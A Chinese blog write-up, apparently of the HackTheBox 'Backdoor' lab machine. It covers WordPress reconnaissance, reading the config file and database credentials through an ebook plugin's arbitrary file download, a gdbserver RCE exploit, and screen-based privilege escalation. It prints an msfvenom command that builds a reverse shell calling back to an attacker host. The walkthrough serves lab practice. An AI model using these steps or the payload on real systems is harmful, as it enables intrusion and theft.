当前位置:网站首页>[HTB]渗透Backdoor靶机
[HTB]渗透Backdoor靶机
2022-08-11 05:31:00 【欢乐的小鸡】
对靶机进行信息收集
发现是由WordPress 5.8.1搭建

使用wpscan看一下有没有漏洞


没有找到漏洞只看到了一个管理员账号admin

使用searchsploit工具扫描后发现有三个插件有漏洞,但是我们没有办法确定靶机里面有没有这三个插件
访问content/plugins看看,发现了ebook插件

发现这个插件是任意插件下载漏洞,下载配置文件

查看配置文件发现了数据库账号和密码

下载进程看看有没有异常进程
这个嘛我找到了异常进程也知道了pid可是我通过插件的任意文件下载漏洞下载出了问题,也用burp跑了pid900-1000也没有办法跑出来


最后还是没有能下载或爆出来,然后看了一下国外大佬的writeup他们都是用脚跑的
这里有两个脚本


都可以试试

结果在814我说怎么用burp爆不出来
gdbserver有个RCE漏洞metsaploit模块里面有也可以使用脚本两种方法都可以

把payload改为x64的
进去后shell在根目录有个user.txt就有falg
第二种方法
使用msfconsole创建linux反弹木马
使用gdbserver的rce的exploit
脚本:https://www.exploit-db.com/exploits/50539
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.3 LPORT=4444 PrependFork=true -o linux.bin


利用python建立交互shell

利用screen提权

提权语句


两种方法的提权方法都是screen提权
边栏推荐
猜你喜欢
随机推荐
C语言-6月10日-my_strcat函数的编写
欧拉法解微分方程
C语言-6月10日-my_strcpy函数的编写
函数使用记录
C语言-6月8日-给定一个字符数组‘i am a student’ 统计字符a的个数并进行输出
手把手导入企业项目(快速完成本地项目配置)
脚本批量打包渠道包研究
Lua 快速入门(三)——表(Table)
【LeetCode-162】寻找峰值
The mount command - mounted read-only, solution
JVM学习四:垃圾收集器与内存回收策略
C语言-6月8日-求两个数的最小公倍数和最大公因数;判断一个数是否为完数,且打印出它的因子
微信小程序启动页的实现
Unity 数字跳字功能
第六届蓝帽杯 EscapeShellcode
轻松理解进程与线程
Lua 元表(Metatable)
脚本自动选择Hierarchy或Project下的对象
Day 76
nepctf Nyan Cat 彩虹猫









